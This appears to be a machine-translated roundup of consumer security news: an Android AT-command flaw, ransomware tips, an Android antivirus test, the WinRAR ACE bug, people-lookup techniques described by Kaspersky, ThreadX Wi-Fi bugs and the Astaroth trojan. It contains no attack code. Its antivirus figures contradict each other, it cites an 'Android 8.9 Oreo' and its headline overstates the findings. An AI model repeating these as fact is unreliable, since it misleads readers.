US researchers have discovered a vulnerability of Android smartphones that can steal users' personal data

Bluetooth devices endanger smartphones: the list

US researchers have discovered a vulnerability of Android smartphones that can steal users' personal data
US researchers have discovered a vulnerability of Android smartphones that can steal users’ personal data

A new vulnerability affects Android smartphones and endangers hundreds of thousands of devices. The alarm was raised by researchers from Purdue University and Iowa University who published a research paper showing that some Bluetooth devices or USB accessories are able to steal relevant smartphone information such as the IMEI number , the code used to identify a mobile phone.

The technique discovered by the researchers allows a potential hacker an endless series of actions. All very dangerous and endangering users’ personal data . But not only. The devices can be used in turn to launch DDoS attacks (acronym of Distributed Denial of Service) able to KO a website or a company network. The search was carried out on a dozen Android smartphones with different processors: Qualcomm, HiSilicon (Kirin) and Samsung (Exynos) and all were vulnerable to attack, even if in a different way.

The researchers immediately alerted the producers and waited ninety days before publishing the report, to allow time to develop a patch. The only company that gave the researchers an answer was Samsung, which started developing a fix that will be published with the next updates.

How the vulnerability that affects Android smartphones works

Let’s start with the conclusion: the vulnerability discovered by the researchers is rather complicated to implement and requires a big investment in terms of time and hours by the hackers. But some attackers could still exploit it to steal your personal information.

As explained in the research paper, the vulnerability affects several Android smartphones , which exploit an operating system flaw to “enter” the device. To do this it is necessary to use Bluetooth devices or USB accessories designed specifically for this type of operation. Researchers have shown that using these devices it is possible to execute AT commands . These are commands that set features such as connection type, waiting times, and busy signal detection. Also, you can also get the IMEI number of the smartphone, take control of the mobile phone for perform DDoS attacks or remotely stop smartphone connectivity. A series of important activities in a person’s everyday life.

The list of Android smartphones affected by the vulnerability

The researchers tested ten devices from six different manufacturers . Here is the complete list:

Galaxy S8 +
Google Pixel 2
Huawei Nexus 6P
Motorola Nexus 6
Galaxy Note 2
Galaxy S3
LG G3
LG Nexus 5
HTC Desire 10 Lifestyle
Huawei P8 Lite

These are fairly dated smartphones, but this does not mean that newer devices are not equally vulnerable to attack. As mentioned above, researchers have warned manufacturers that they are working to release a security patch as soon as possible. Samsung was the first to get to work to find a solution to the problem.

Ransomware

Ransomware: what it is and how to protect yourself

Ransomware
The Ransomware is not a new aggression. In fact, the first time this type of computer attack was recognized was around 1989 and it spread from one computer to another through the use of a diskette. Currently all information and devices are connected through the network.
Thanks to the existence of different programs of Ransomware in open source and the possibility of obtaining great economic benefits this type of aggressions has become more frequent with the passage of time . The aim of the attacker always responds to economic reasons. The Ransomware is not intended to damage the victim’s files but to steal them and then ask for a ransom for them .

But how can we prevent a Ransomware attack from occurring?

Here are some tips:

Update the operating system and applications regularly . Most updates have security patches that are essential to ensure the security of any device. Updating web browsers is especially important.

Backup copies : Regularly backing up your operating system on external devices is highly recommended. If there is any loss of information or any type of aggression we can ensure that we have a receipt. There is a large number of free cloud storage systems.

Use antivirus and update it : Avast is a very practical option because it offers different degrees of protection that include Ransomware devices.

Take preventive measures : For example, you should avoid opening files and links that come from unknown sources. All those emails that come from an unreliable contact should be automatically deleted without even opening it. On the other hand, when you are going to enter your personal data in any form, make sure that the web has HTTPS protocol enabled.
Only by following these simple measures will you be able to protect yourself against attacks with Ransomware.

Confirmed: installing an antivirus on Android is exactly the same as not doing it

Installing an antivirus on Android is exactly the same as not installing it

Confirmed: installing an antivirus on Android is exactly the same as not doing it

Every year there are 1 or 2 ‘viruses’ important for mobile phones, it is even said that 2019 will be the year of malware thanks to the increase and the proliferation of fake apps with malicious code , backdoors, banking Trojans and the boom of cryptomining malware . Currently there are several free antivirus for Android phones , but it has been confirmed that installing them is exactly the same as not doing it.

A report from AV-Comparatives shows that the company has tested 250 antivirus applications for Android, Google’s platform, and that they have discovered that only 80% of them approved the basic standards of the site . That is, more than 30% of the malicious apps of 2018 were detected and had zero false alarms, although some applications fell short.

To carry out the study, the tests were conducted in January 2019 and the researchers used a Samsung Galaxy S9 with Android 8.9 Oreo and a Nexus 5 with Android 6.01 . The mechanics was to check the effectiveness of the 250 applications against the 2,000 most common malware threats for Android during 2018.

Only 23 apps detected 100% of the threats

2019 will be the year of the malware according to the latest report of the well-known McAfee antivirus

During the study it is also reflected that the applications overlooked antivirus known as AVG, Kaspersky, McAfee and Symantec, which usually catch everything . In addition, it is reflected that antimalware apps from 32 suppliers have been removed from Play Store in the last two months since the test was conducted.

Of all the antivirus, only 80 detected more than 30% of the malware, and of those, 23 detected 100% of the threats . Researchers advise users not to get carried away by the users’ qualifications , since most of them offer a rating based on their experience, without knowing if that app offers effective protection.

The study also recommends users to use antivirus from well-known, verified and reputable suppliers . An investigation that illustrates the challenge faced by Google and other store operators when it comes to selecting applications.

WinRAR has a bug

WinRAR has a bug: 500 million users at risk

WinRAR has a bug
CheckPoint researchers discovered a vulnerability in WinRAR that endangered the PCs of 500 million users. Here’s what to do to defend yourself

A bug in WinRAR has endangered the personal data of over 500 million users . Check Point researchers, a company specializing in cybersecurity, discovered the flaw and immediately warned the developers of WinRAR. A patch to solve the problem has already been released. The bug r any PC vulnerable to any type of cyber attack and gave hackers the ability to take control of the computer and the entire corporate network.

The vulnerability was present on WinRAR since the release of the first version and has affected all the versions developed in the last 19 years. The problem lay in the UNACEV2.DLL library used to decompress files in ACE format. By exploiting the vulnerability, hackers could hide viruses in the ACE files that infect the computer without the user being aware of it. The library had no countermeasure against this type of attack and made the PC vulnerable. WinRAR has released a patch that disables the offending library.

What is likely to use an old version of WinRAR

If you are still using an outdated version of WinRAR, you are endangering the security of your data and your PC. The vulnerability discovered by CheckPoint researchers allows hackers to take control of the PC and the corporate network. The developers of WinRAR have released a new version ( WinRAR 5.70 Beta 1 ) that solves the problem by disabling the use of the UNACEV2.DLL library. The only drawback concerns the end of support for ACE formats that can no longer be decompressed using WinRAR.

To update WinRAR just access the program website and download the latest version of the software.

he vast majority of targeted attacks start from a phishing mail

How do hackers spy on us: How To avoid the risk of hackers stealing data

he vast majority of targeted attacks start from a phishing mail
Just a photo or phone number to discover your identity on the Internet. Do not you believe it? Then you do not know the experiments conducted by Kaspersky.

In recent years hacker attacks have increased exponentially. Some of these episodes have resulted in the theft of personal data of millions of social network users and other sites that required registration. In other cases, however, it was targeted attacks, to take possession of personal data of specific people or to enter their computers and their mobile devices.

According to the well-known computer security company Kaspersky, the vast majority of targeted attacks start from a phishing mail . This means that hackers have managed to get hold of some user data and used them for a more complex and profitable attack on them. But how do hackers steal the data ? Kaspersky himself did an experiment: he tried to replicate all the possible ways in which a hacker can obtain information about us starting from an anonymous photo, a name and surname or an email address and telephone number.

How to find out a person’s name from a photo

When a hacker has only one photo available, his search starts uphill. There are sites like FindFace that can recover a person’s social identity if we provide him with several shots to process. Once it was a free tool and open to the public, now the company prefers to sell its technology only to governments and large companies. A hacker could also use Google, but with very few results because the search for images does not shine for accuracy and can only find the photos posted on websites and not those posted on social networks.

How to find a person with name and surname

Having the name and surname available, however, the hacker’s mission begins to be simpler. Unless the user has a very common name and surname, like Mario Rossi. With these two data it is often possible to find at least one more or less public social profile of the user, from which extrapolate other useful information to continue the attack.

How to find a person with email

With email and phone number an attacker can use services like Pipl, which collects information from different social networks and creates almost complete profiles with everything on the web about that person. If the username of the personal email box is then the same as that of the company, an attacker could use programs like Namechk or Knowem that automatically track an account created with hundreds of different services including: Facebook, Blogger, Ebay, WordPress, Pinterest and many others. Therefore, starting from a company email address, you can easily reach a personal profile.

What to do to avoid identity theft

To avoid the risk of hackers stealing data, Kaspersky reiterates some basic advice:

Do not register on social networks with e-mail addresses or phone numbers that are then made public
Do not use the same photo on personal and work profiles
Use different names to prevent one profile from leading to another and so on
Do not make life easier for cybercriminals by posting unnecessary information about you on social networks

A computer scientist has discovered four vulnerabilities in Wi-Fi that would endanger millions of devices including PS4 and Xbox

PS4 and Xbox at risk of hackers due to Wi-Fi

A computer scientist has discovered four vulnerabilities in Wi-Fi that would endanger millions of devices including PS4 and Xbox
We use Wi-Fi technology every day to connect our devices to the Internet. It has become normal to activate the Wi-Fi icon and wait for the few seconds that separate us from the Net. Unfortunately, Wi-Fi hides a problem that could put millions of devices at risk. The wanted Denis Selianin has discovered four vulnerabilities that endanger certain devices that use Wi-Fi technology .

There are 6.2 billion electronic devices potentially attacked by hackers due to a series of Wi-Fi vulnerabilities discovered by the company researcher Embedi and among them there are also millions of PlayStation 4, Xbox One, Windows Surface laptops, Chromebooks, and smartphones of many brands. It all depends, Selianin explains, on a trivial security problem with the ThreadX operating system , used as a firmware to run most of the Wi-Fi chips.

What are the vulnerabilities affecting Wi-Fi

For example, the researcher was able to easily violate a Marvell Acastar 88W8897 wireless network chip that is extremely widespread. The potential vulnerabilities discovered by Selianin are four, all very simple to put in place for a hacker and all very dangerous for the damage they could cause. One of the vulnerabilities, for example, can be activated without any user interaction when scanning available networks. The tested Marvel chip, in fact, scans the networks independently every five minutes. Thanks to the bug in the ThreadX operating systemhowever, with each of these scans, malicious code portions could be sent to the devices to take control of them. And this even if the devices are not connected to any network, but are simply detectable because in the range of the Wi-Fi chip .

Selianin explained that he had found two methods to exploit this bug: one worked only with the Marvell chipset, the other with any ThreadX-based firmware. The researcher has also shown the code to exploit these vulnerabilities, hiding the technical details that would allow hackers to use it to infect billions of devices with Wi-Fi chips controlled by ThreadX.

How to protect your devices

The big problem is just the huge diffusion that this operating system has had on devices of all kinds. Now Express Logic, the company that develops ThreadX, will have to quickly create a patch to ” plug the holes ” discovered by Selianin and, even more difficult, the update of the operating system will have to be spread on all devices with WiFi chips that already they use it. Users, meanwhile, do not have many ways to protect themselves because the Wi-Fi chip scans networks on its own. On PS4 and Xbox One , for example, the only option is to disable Wi-Fi from the console settings . On laptops and smartphones, however, use without Wi-Fi is almost unthinkable today.

A trojan disguised as an image can infect PCs and avoid being recognized by antivirus. Here's how Astaroth works

Astaroth: A trojan disguised as an image can infect PC and steals your data

A trojan disguised as an image can infect PCs and avoid being recognized by antivirus. Here’s how Astaroth works

A trojan disguised as an image can infect PCs and avoid being recognized by antivirus. Here's how Astaroth works

In these days, a new hacker campaign with the Astaroth trojan , already known to security experts because it has infected thousands of computers around the world in the last three months of 2018, is underway in Brazil and Europe . infection starts from a false image, spread by email.

The new strain of the trojan was discovered by Cybereason researchers and also uses BITSAdmin , an official utility of Microsoft Windows designed to facilitate the operations of downloading or uploading, but used by the trojan to download malicious code. This variant of Astaroth is distributed through spam email campaigns and the infection begins with the opening by the user of an archive in .7zip format attached to the email or inserted in a link or, in fact, in a Gif or Jpg image. The malicious archive contains a .lnk file that starts the actual infection. Subsequently, the malware connects to a server and begins to steal information on the infected computer. Then use BITSAdmin to fetch other images and files from another server.

Immune to antiviruses

The very dangerous thing about Astaroth, and the novelty compared to previous infections based on this trojan, is its ability to modify, injecting a malicious code, a .dll file used by the Avast antivirus. Through this file, after having infected it, the trojan manages to steal other information about the machine it is running on and to download other code. Moreover, it also manages to hide itself in case of an antivirus scan carried out with Avast.

What Astaroth does

The Cybereason research team has discovered that once the trojan has successfully infiltrated, it records user keystrokes, intercepts their calls to the operating system and continually gathers all the information saved to the clipboard . With these methods, it collects significant amounts of personal information, including those on the user’s bank accounts. And if the infected PC is connected to a LAN, Astaroth can also collect the network access passwords of all the other computers connected to the same LAN, the email account passwords, the Messenger account data, the password Internet Explorer.

Astaroth first appeared online in 2017, and then infected thousands of PCs, especially in South America. He had several evolutions before arriving at the current one. An earlier version, for example, was hidden in fake Amazon emails containing confirmations of orders never made by the user. But if the user clicked on the links contained in the email the infection started.